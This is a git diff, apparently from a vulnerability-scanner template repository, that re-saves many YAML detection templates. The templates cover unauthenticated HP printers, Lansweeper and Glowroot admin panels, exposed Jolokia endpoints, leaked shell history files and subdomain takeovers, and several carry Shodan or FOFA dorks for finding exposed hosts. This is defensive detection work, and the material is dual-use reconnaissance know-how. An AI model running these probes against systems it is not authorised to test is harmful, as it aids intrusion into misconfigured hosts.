-    shodan-dork: http.title:"Hp Officejet pro"
-  tags: hp,iot,unauth
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-      - "{{BaseURL}}/hp/device/webAccess/index.htm?content=security"
-
-    matchers-condition: and
-    matchers:
-      - type: regex
-        regex:
-          - '<title>(HP Officejet Pro([ 0-9A-Za-z]+)|HP Designjet([ 0-9A-Za-z]+).*)<\/title>'
-
-      - type: status
-        status:
-          - 200
+id: unauthorized-printer-hp
+
+info:
+  name: Unauthorized HP office pro printer
+  author: pussycat0x,r3naissance
+  severity: high
+  metadata:
+    shodan-dork: http.title:"Hp Officejet pro"
+  tags: hp,iot,unauth
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+      - "{{BaseURL}}/hp/device/webAccess/index.htm?content=security"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - '<title>(HP Officejet Pro([ 0-9A-Za-z]+)|HP Designjet([ 0-9A-Za-z]+).*)<\/title>'
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/hpe-system-management-anonymous.yaml b/misconfiguration/hpe-system-management-anonymous.yaml
index 7239ec4921..d7832e0f4b 100644
--- a/misconfiguration/hpe-system-management-anonymous.yaml
+++ b/misconfiguration/hpe-system-management-anonymous.yaml
@@ -1,21 +1,21 @@
-id: hpe-system-management-anonymous-access
+id: hpe-system-management-anonymous-access
 
-info:
-  name: HPE System Management Anonymous Access
-  author: divya_mudgal
-  severity: low
-  tags: hp,unauth
+info:
+  name: HPE System Management Anonymous Access
+  author: divya_mudgal
+  severity: low
+  tags: hp,unauth
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/chpstrt.php?chppath=Home"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        condition: and
-        words:
-          - "username = \"hpsmh_anonymous\";"
-          - "var host_addr = '"
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/chpstrt.php?chppath=Home"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        condition: and
+        words:
+          - "username = \"hpsmh_anonymous\";"
+          - "var host_addr = '"
           - "var ip_addr   = '"
\ No newline at end of file
diff --git a/misconfiguration/jolokia/jolokia-info-disclosure.yaml b/misconfiguration/jolokia/jolokia-info-disclosure.yaml
index d694930746..27a090c5b7 100644
--- a/misconfiguration/jolokia/jolokia-info-disclosure.yaml
+++ b/misconfiguration/jolokia/jolokia-info-disclosure.yaml
@@ -1,72 +1,72 @@
-id: jolokia-info-disclosure
-
-info:
-  name: Jolokia - Information disclosure
-  author: pussycat0x
-  severity: medium
-  reference:
-    - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/
-    - https://github.com/laluka/jolokia-exploitation-toolkit
-  tags: jolokia,springboot,mbean,tomcat
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName"
-      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor"
-      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion"
-      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId"
-      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName"
-      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor"
-      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion"
-      - "{{BaseURL}}/actuator/jolokia/read/java.lang:type=Memory"
-      - "{{BaseURL}}/jolokia/read/java.lang:type=Memory"
-      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName"
-      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor"
-      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion"
-      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId"
-      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName"
-      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor"
-      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion"
-
-    matchers-condition: or
-    matchers:
-      - type: word
-        name: memory
-        words:
-          - '"mbean":"java.lang:type=Memory"'
-
-      - type: word
-        name: implementation-vendor
-        words:
-          - '"attribute":"ImplementationVendor"'
-
-      - type: word
-        name: implementation-version
-        words:
-          - '"attribute":"ImplementationVersion"'
-
-      - type: word
-        name: implementation-name
-        words:
-          - '"attribute":"ImplementationName"'
-
-      - type: word
-        name: specification-vendor
-        words:
-          - '"attribute":"SpecificationVendor"'
-
-      - type: word
-        name: mbean-serverid
-        words:
-          - '"attribute":"MBeanServerId"'
-
-      - type: word
-        name: specification-name
-        words:
-          - '"attribute":"SpecificationName"'
-
-      - type: word
-        name: specification-version
-        words:
-          - '"attribute":"SpecificationVersion'
+id: jolokia-info-disclosure
+
+info:
+  name: Jolokia - Information disclosure
+  author: pussycat0x
+  severity: medium
+  reference:
+    - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/
+    - https://github.com/laluka/jolokia-exploitation-toolkit
+  tags: jolokia,springboot,mbean,tomcat
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName"
+      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor"
+      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion"
+      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId"
+      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName"
+      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor"
+      - "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion"
+      - "{{BaseURL}}/actuator/jolokia/read/java.lang:type=Memory"
+      - "{{BaseURL}}/jolokia/read/java.lang:type=Memory"
+      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName"
+      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor"
+      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion"
+      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId"
+      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName"
+      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor"
+      - "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion"
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        name: memory
+        words:
+          - '"mbean":"java.lang:type=Memory"'
+
+      - type: word
+        name: implementation-vendor
+        words:
+          - '"attribute":"ImplementationVendor"'
+
+      - type: word
+        name: implementation-version
+        words:
+          - '"attribute":"ImplementationVersion"'
+
+      - type: word
+        name: implementation-name
+        words:
+          - '"attribute":"ImplementationName"'
+
+      - type: word
+        name: specification-vendor
+        words:
+          - '"attribute":"SpecificationVendor"'
+
+      - type: word
+        name: mbean-serverid
+        words:
+          - '"attribute":"MBeanServerId"'
+
+      - type: word
+        name: specification-name
+        words:
+          - '"attribute":"SpecificationName"'
+
+      - type: word
+        name: specification-version
+        words:
+          - '"attribute":"SpecificationVersion'
diff --git a/misconfiguration/jolokia/jolokia-list.yaml b/misconfiguration/jolokia/jolokia-list.yaml
index b9168a54e0..a8b325b1ed 100644
--- a/misconfiguration/jolokia/jolokia-list.yaml
+++ b/misconfiguration/jolokia/jolokia-list.yaml
@@ -1,28 +1,28 @@
-id: jolokia-list
-
-info:
-  name: Jolokia - List
-  author: pussycat0x
-  severity: low
-  reference:
-    - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/
-    - https://github.com/laluka/jolokia-exploitation-toolkit
-  tags: jolokia,springboot,tomcat
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/jolokia/list"
-      - "{{BaseURL}}/actuator/jolokia/list"
-
-    stop-at-first-match: true
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        part: body
-        words:
-          - '"type":"list"'
+id: jolokia-list
+
+info:
+  name: Jolokia - List
+  author: pussycat0x
+  severity: low
+  reference:
+    - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/
+    - https://github.com/laluka/jolokia-exploitation-toolkit
+  tags: jolokia,springboot,tomcat
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/jolokia/list"
+      - "{{BaseURL}}/actuator/jolokia/list"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - '"type":"list"'
diff --git a/misconfiguration/jolokia/jolokia-mbean-search.yaml b/misconfiguration/jolokia/jolokia-mbean-search.yaml
index 517e572b87..d105f9e1bd 100644
--- a/misconfiguration/jolokia/jolokia-mbean-search.yaml
+++ b/misconfiguration/jolokia/jolokia-mbean-search.yaml
@@ -1,30 +1,30 @@
-id: jolokia-mbean-search
-
-info:
-  name: Jolokia - Searching MBeans
-  author: pussycat0x
-  severity: low
-  reference:
-    - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/
-    - https://github.com/laluka/jolokia-exploitation-toolkit
-  tags: jolokia,springboot,mbean,tomcat
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/jolokia/search/*:test=test"
-      - "{{BaseURL}}/actuator/jolokia/search/*:test=test"
-
-    stop-at-first-match: true
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 200
-
-      - type: word
-        part: body
-        words:
-          - '"type":"search"'
-          - '"value":'
-        condition: and
+id: jolokia-mbean-search
+
+info:
+  name: Jolokia - Searching MBeans
+  author: pussycat0x
+  severity: low
+  reference:
+    - https://thinkloveshare.com/hacking/ssrf_to_rce_with_jolokia_and_mbeans/
+    - https://github.com/laluka/jolokia-exploitation-toolkit
+  tags: jolokia,springboot,mbean,tomcat
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/jolokia/search/*:test=test"
+      - "{{BaseURL}}/actuator/jolokia/search/*:test=test"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+
+      - type: word
+        part: body
+        words:
+          - '"type":"search"'
+          - '"value":'
+        condition: and
diff --git a/misconfiguration/shell-history.yaml b/misconfiguration/shell-history.yaml
index 9c9c6dcb81..30a08a0057 100644
--- a/misconfiguration/shell-history.yaml
+++ b/misconfiguration/shell-history.yaml
@@ -1,50 +1,50 @@
-id: shell-history
-
-info:
-  name: Shell History
-  author: pentest_swissky,geeknik
-  severity: low
-  description: Discover history for bash, ksh, sh, and zsh
-  tags: misconfig
-
-requests:
-  - method: GET
-    max-redirects: 1
-    path:
-      - "{{BaseURL}}/.bash_history"
-      - "{{BaseURL}}/.ksh_history"
-      - "{{BaseURL}}/.sh_history"
-      - "{{BaseURL}}/.zsh_history"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "ls"
-          - "mkdir "
-          - "chmod "
-          - "mv "
-          - "nano "
-          - "vim "
-          - "pico "
-          - "sudo "
-          - "cd "
-          - "cp "
-          - "ps aux "
-        condition: or
-
-      - type: word
-        words:
-          - "<?xml"
-          - "<env"
-          - "application/javascript"
-          - "application/json"
-          - "application/xml"
-          - "html>"
-          - "text/html"
-        part: response
-        negative: true
-
-      - type: status
-        status:
-          - 200
+id: shell-history
+
+info:
+  name: Shell History
+  author: pentest_swissky,geeknik
+  severity: low
+  description: Discover history for bash, ksh, sh, and zsh
+  tags: misconfig
+
+requests:
+  - method: GET
+    max-redirects: 1
+    path:
+      - "{{BaseURL}}/.bash_history"
+      - "{{BaseURL}}/.ksh_history"
+      - "{{BaseURL}}/.sh_history"
+      - "{{BaseURL}}/.zsh_history"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "ls"
+          - "mkdir "
+          - "chmod "
+          - "mv "
+          - "nano "
+          - "vim "
+          - "pico "
+          - "sudo "
+          - "cd "
+          - "cp "
+          - "ps aux "
+        condition: or
+
+      - type: word
+        words:
+          - "<?xml"
+          - "<env"
+          - "application/javascript"
+          - "application/json"
+          - "application/xml"
+          - "html>"
+          - "text/html"
+        part: response
+        negative: true
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/unauthenticated-glowroot.yaml b/misconfiguration/unauthenticated-glowroot.yaml
index fbecad8181..a1aaf482f7 100644
--- a/misconfiguration/unauthenticated-glowroot.yaml
+++ b/misconfiguration/unauthenticated-glowroot.yaml
@@ -1,33 +1,33 @@
-id: unauthenticated-glowroot
-
-info:
-  name: Glowroot Anonymous User
-  author: pussycat0x
-  severity: high
-  description: Anonymous user access allows to understand the host internals
-  metadata:
-    shodan-query: http.title:"Glowroot"
-  tags: misconfig,unauth,glowroot
-
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/backend/admin/users?username=anonymous'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '"username":"anonymous"'
-          - '"Administrator"'
-          - '"newPassword":""'
-        condition: and
-
-      - type: word
-        words:
-          - "application/json"
-        part: header
-
-      - type: status
-        status:
-          - 200
+id: unauthenticated-glowroot
+
+info:
+  name: Glowroot Anonymous User
+  author: pussycat0x
+  severity: high
+  description: Anonymous user access allows to understand the host internals
+  metadata:
+    shodan-query: http.title:"Glowroot"
+  tags: misconfig,unauth,glowroot
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/backend/admin/users?username=anonymous'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"username":"anonymous"'
+          - '"Administrator"'
+          - '"newPassword":""'
+        condition: and
+
+      - type: word
+        words:
+          - "application/json"
+        part: header
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/unauthenticated-lansweeper.yaml b/misconfiguration/unauthenticated-lansweeper.yaml
index 90c3fa5708..c7c5563863 100644
--- a/misconfiguration/unauthenticated-lansweeper.yaml
+++ b/misconfiguration/unauthenticated-lansweeper.yaml
@@ -1,17 +1,17 @@
-id: unauthenticated-lansweeper
+id: unauthenticated-lansweeper
 
-info:
-  name: Unauthenticated Lansweeper Instance
-  author: divya_mudgal
-  severity: high
-  tags: lansweeper,unauth
+info:
+  name: Unauthenticated Lansweeper Instance
+  author: divya_mudgal
+  severity: high
+  tags: lansweeper,unauth
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/Default.aspx"
-
-    matchers:
-      - type: word
-        words:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Default.aspx"
+
+    matchers:
+      - type: word
+        words:
           - "Main page - Lansweeper"
\ No newline at end of file
diff --git a/misconfiguration/unauthorized-puppet-node-manager-detect.yaml b/misconfiguration/unauthorized-puppet-node-manager-detect.yaml
index 2ee4377bda..1e411a7ba4 100644
--- a/misconfiguration/unauthorized-puppet-node-manager-detect.yaml
+++ b/misconfiguration/unauthorized-puppet-node-manager-detect.yaml
@@ -1,24 +1,24 @@
-id: unauthorized-puppet-node-manager
+id: unauthorized-puppet-node-manager
 
-info:
-  name: Pupet Node Manager
-  author: pussycat0x
-  severity: medium
-  metadata:
-    fofa-dork: 'app="puppet-Node-Manager"'
-  tags: node,misconfig
+info:
+  name: Pupet Node Manager
+  author: pussycat0x
+  severity: medium
+  metadata:
+    fofa-dork: 'app="puppet-Node-Manager"'
+  tags: node,misconfig
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '<a href="/nodes">Nodes</a>'
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<a href="/nodes">Nodes</a>'
+
+      - type: status
+        status:
+          - 200
diff --git a/misconfiguration/wamp-server-configuration.yaml b/misconfiguration/wamp-server-configuration.yaml
index 79b7682bf7..304da8b4e0 100644
--- a/misconfiguration/wamp-server-configuration.yaml
+++ b/misconfiguration/wamp-server-configuration.yaml
@@ -1,24 +1,24 @@
-id: wamp-server-configuration
+id: wamp-server-configuration
 
-info:
-  name: default-wamp-server-page
-  author: pussycat0x
-  severity: medium
-  description: Wamp default page will expose sensitive configuration and vhosts.
-  reference: https://www.exploit-db.com/ghdb/6891.
-  tags: wamp,exposure
+info:
+  name: default-wamp-server-page
+  author: pussycat0x
+  severity: medium
+  description: Wamp default page will expose sensitive configuration and vhosts.
+  reference: https://www.exploit-db.com/ghdb/6891.
+  tags: wamp,exposure
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: dsl
-        dsl:
-          - 'contains(tolower(body), "wampserver")'
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains(tolower(body), "wampserver")'
+
+      - type: status
+        status:
+          - 200
diff --git a/takeovers/announcekit-takeover.yaml b/takeovers/announcekit-takeover.yaml
index 2440b15ac1..b0eaa68779 100644
--- a/takeovers/announcekit-takeover.yaml
+++ b/takeovers/announcekit-takeover.yaml
@@ -1,25 +1,25 @@
-id: announcekit-takeover
+id: announcekit-takeover
 
-info:
-  name: Announcekit Takeover Detection
-  author: melbadry9
-  severity: high
-  tags: takeover,announcekit
-  reference:
-    - https://blog.melbadry9.xyz/dangling-dns/xyz-services/dangling-dns-announcekit
-    - https://github.com/EdOverflow/can-i-take-over-xyz/issues/228
+info:
+  name: Announcekit Takeover Detection
+  author: melbadry9
+  severity: high
+  tags: takeover,announcekit
+  reference:
+    - https://blog.melbadry9.xyz/dangling-dns/xyz-services/dangling-dns-announcekit
+    - https://github.com/EdOverflow/can-i-take-over-xyz/issues/228
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - 'Error 404 - AnnounceKit'
-
-      - type: status
-        status:
-          - 404
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'Error 404 - AnnounceKit'
+
+      - type: status
+        status:
+          - 404
diff --git a/technologies/apache/ranger-detection.yaml b/technologies/apache/ranger-detection.yaml
index d299f2c75d..abe004645c 100644
--- a/technologies/apache/ranger-detection.yaml
+++ b/technologies/apache/ranger-detection.yaml
@@ -1,29 +1,29 @@
-id: ranger-detection
+id: ranger-detection
 
-info:
-  name: Apache Ranger Detection
-  author: For3stCo1d
-  severity: info
-  tags: tech,apache,ranger
-  metadata:
-    shodan-query: http.title:"Ranger - Sign In"
-  reference: https://github.com/apache/ranger
+info:
+  name: Apache Ranger Detection
+  author: For3stCo1d
+  severity: info
+  tags: tech,apache,ranger
+  metadata:
+    shodan-query: http.title:"Ranger - Sign In"
+  reference: https://github.com/apache/ranger
 
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/login.jsp'
-      - "{{BaseURL}}/images/favicon.ico"
-
-    stop-at-first-match: true
-    matchers-condition: or
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "<title> Ranger - Sign In</title>"
-
-      - type: dsl
-        name: favicon
-        dsl:
-          - "status_code==200 && ('1302629996' == mmh3(base64_py(body)))"
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/login.jsp'
+      - "{{BaseURL}}/images/favicon.ico"
+
+    stop-at-first-match: true
+    matchers-condition: or
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<title> Ranger - Sign In</title>"
+
+      - type: dsl
+        name: favicon
+        dsl:
+          - "status_code==200 && ('1302629996' == mmh3(base64_py(body)))"
diff --git a/technologies/aws-elastic-beanstalk-detect.yaml b/technologies/aws-elastic-beanstalk-detect.yaml
index 9c88c7b2ae..532f1b9aee 100644
--- a/technologies/aws-elastic-beanstalk-detect.yaml
+++ b/technologies/aws-elastic-beanstalk-detect.yaml
@@ -1,31 +1,31 @@
-id: elastic-beanstalk-detect
+id: elastic-beanstalk-detect
 
-info:
-  name: AWS Elastic Beanstalk Detect
-  author: pussycat0x
-  severity: info
-  tags: aws,tech,beanstalk
+info:
+  name: AWS Elastic Beanstalk Detect
+  author: pussycat0x
+  severity: info
+  tags: aws,tech,beanstalk
 
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '<li><a href="http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/Welcome.html">AWS Elastic Beanstalk overview</a></li>'
-          - '<li><a href="http://docs.amazonwebservices.com/elasticbeanstalk/latest/dg/">AWS Elastic Beanstalk overview</a></li>'
-        condition: or
-
-      - type: status
-        status:
-          - 200
-
-    extractors:
-      - type: regex
-        part: body
-        group: 1
-        regex:
-          - '<title>([A-Za-z -]+)<\/title>'
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<li><a href="http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/Welcome.html">AWS Elastic Beanstalk overview</a></li>'
+          - '<li><a href="http://docs.amazonwebservices.com/elasticbeanstalk/latest/dg/">AWS Elastic Beanstalk overview</a></li>'
+        condition: or
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '<title>([A-Za-z -]+)<\/title>'
diff --git a/technologies/elasticsearch-sql-client-detect.yaml b/technologies/elasticsearch-sql-client-detect.yaml
index 449560e43d..0522884878 100644
--- a/technologies/elasticsearch-sql-client-detect.yaml
+++ b/technologies/elasticsearch-sql-client-detect.yaml
@@ -1,25 +1,25 @@
-id: elasticsearch-sql-client-detect
-
-info:
-  name: Elasticsearch SQL Client Detect
-  author: pussycat0x
-  severity: low
-  metadata:
-    shodan-query: http.title:"Elasticsearch-sql client"
-  tags: elasticsearch,tech,sql
-
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '<title>Elasticsearch-sql client</title>'
-        part: body
-
-      - type: status
-        status:
-          - 200
+id: elasticsearch-sql-client-detect
+
+info:
+  name: Elasticsearch SQL Client Detect
+  author: pussycat0x
+  severity: low
+  metadata:
+    shodan-query: http.title:"Elasticsearch-sql client"
+  tags: elasticsearch,tech,sql
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '<title>Elasticsearch-sql client</title>'
+        part: body
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/hp-blade-admin-detect.yaml b/technologies/hp-blade-admin-detect.yaml
index cd397e7acd..dd20eed05f 100644
--- a/technologies/hp-blade-admin-detect.yaml
+++ b/technologies/hp-blade-admin-detect.yaml
@@ -1,24 +1,24 @@
-id: hp-blade-system
+id: hp-blade-system
 
-info:
-  name: HP BladeSystem Onboard Administrator
-  author: pussycat0x
-  severity: info
-  metadata:
-    shodan-query: http.title:"HP BladeSystem"
-  tags: panel,hp
+info:
+  name: HP BladeSystem Onboard Administrator
+  author: pussycat0x
+  severity: info
+  metadata:
+    shodan-query: http.title:"HP BladeSystem"
+  tags: panel,hp
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "<title>HP BladeSystem Onboard Administrator</title>"
-
-      - type: status
-        status:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>HP BladeSystem Onboard Administrator</title>"
+
+      - type: status
+        status:
           - 200
\ No newline at end of file
diff --git a/technologies/hp-media-vault-detect.yaml b/technologies/hp-media-vault-detect.yaml
index fa2886e465..8731f6e1bc 100644
--- a/technologies/hp-media-vault-detect.yaml
+++ b/technologies/hp-media-vault-detect.yaml
@@ -1,25 +1,25 @@
-id: hp-media-vault-detect
+id: hp-media-vault-detect
 
-info:
-  name: HP Media Vault Detect
-  author: pussycat0x
-  severity: info
-  metadata:
-    fofa-query: 'app="HP-Media-Vault-Media-Server"'
-  tags: tech,hp
+info:
+  name: HP Media Vault Detect
+  author: pussycat0x
+  severity: info
+  metadata:
+    fofa-query: 'app="HP-Media-Vault-Media-Server"'
+  tags: tech,hp
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "<title>HP Media Vault"
-        part: body
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<title>HP Media Vault"
+        part: body
+
+      - type: status
+        status:
+          - 200
diff --git a/technologies/landesk/landesk-csa.yaml b/technologies/landesk/landesk-csa.yaml
index 7aa01b344b..06661dcf6a 100644
--- a/technologies/landesk/landesk-csa.yaml
+++ b/technologies/landesk/landesk-csa.yaml
@@ -1,23 +1,23 @@
-id: landesk-csa
-
-info:
-  name: LANDESK(R) Cloud Services Appliance Detect
-  author: 0xNirvana
-  severity: info
-  metadata:
-    verified: true
-    shodan-query: http.html:"LANDESK(R)"
-  tags: technology,landesk
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}"
-
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "LANDESK(R)"
-          - "Cloud Services Appliance"
-        condition: and
+id: landesk-csa
+
+info:
+  name: LANDESK(R) Cloud Services Appliance Detect
+  author: 0xNirvana
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: http.html:"LANDESK(R)"
+  tags: technology,landesk
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "LANDESK(R)"
+          - "Cloud Services Appliance"
+        condition: and
diff --git a/technologies/nexus-detect.yaml b/technologies/nexus-detect.yaml
index 7f3af7d8be..e0a02dcee0 100644
--- a/technologies/nexus-detect.yaml
+++ b/technologies/nexus-detect.yaml
@@ -1,23 +1,23 @@
-id: nexus-detect
+id: nexus-detect
 
-info:
-  name: Nexus Repository Manager (NRM) Instance Detection Template
-  author: righettod
-  severity: info
-  description: Try to detect the presence of a NRM instance via the REST API OpenDocument descriptor
-  tags: tech,nexus
+info:
+  name: Nexus Repository Manager (NRM) Instance Detection Template
+  author: righettod
+  severity: info
+  description: Try to detect the presence of a NRM instance via the REST API OpenDocument descriptor
+  tags: tech,nexus
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/service/rest/swagger.json"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Nexus Repository Manager"
-
-      - type: status
-        status:
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/service/rest/swagger.json"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Nexus Repository Manager"
+
+      - type: status
+        status:
           - 200
\ No newline at end of file
diff --git a/technologies/oauth2-detect.yaml b/technologies/oauth2-detect.yaml
index dd135e7178..5cd181e726 100644
--- a/technologies/oauth2-detect.yaml
+++ b/technologies/oauth2-detect.yaml
@@ -1,28 +1,28 @@
-id: oauth2-detect
+id: oauth2-detect
 
-info:
-  name: OAuth 2.0 Authorization Server Detection Template
-  author: righettod
-  severity: info
-  description: Try to detect OAuth 2.0 Authorization Server via the "oauth/token" endpoint
-  tags: tech,oauth
+info:
+  name: OAuth 2.0 Authorization Server Detection Template
+  author: righettod
+  severity: info
+  description: Try to detect OAuth 2.0 Authorization Server via the "oauth/token" endpoint
+  tags: tech,oauth
 
-requests:
-  - method: POST
-    path:
-      - "{{BaseURL}}/oauth/token"
-
-    body: "grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx"
-
-    matchers-condition: and
-    matchers:
-      - type: status
-        status:
-          - 401
-          - 400
-        condition: or
-
-      - type: word
-        part: body
-        words:
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/oauth/token"
+
+    body: "grant_type=authorization_code&client_id=xxx&redirect_uri=https%3A%2F%2Fprojectdiscovery.io&code=xxx&client_secret=xxx"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 401
+          - 400
+        condition: or
+
+      - type: word
+        part: body
+        words:
           - 'error":"invalid_client"'
\ No newline at end of file
diff --git a/technologies/olivetti-crf-detect.yaml b/technologies/olivetti-crf-detect.yaml
index b2aca8edae..830f040334 100644
--- a/technologies/olivetti-crf-detect.yaml
+++ b/technologies/olivetti-crf-detect.yaml
@@ -1,25 +1,25 @@
-id: olivetti-crf-detect
+id: olivetti-crf-detect
 
-info:
-  name: Olivetti CRF Detect
-  author: pussycat0x
-  severity: info
-  metadata:
-    shodan-query: http.title:"Olivetti CRF"
-  tags: tech,olivetti
+info:
+  name: Olivetti CRF Detect
+  author: pussycat0x
+  severity: info
+  metadata:
+    shodan-query: http.title:"Olivetti CRF"
+  tags: tech,olivetti
 
-requests:
-  - method: GET
-    path:
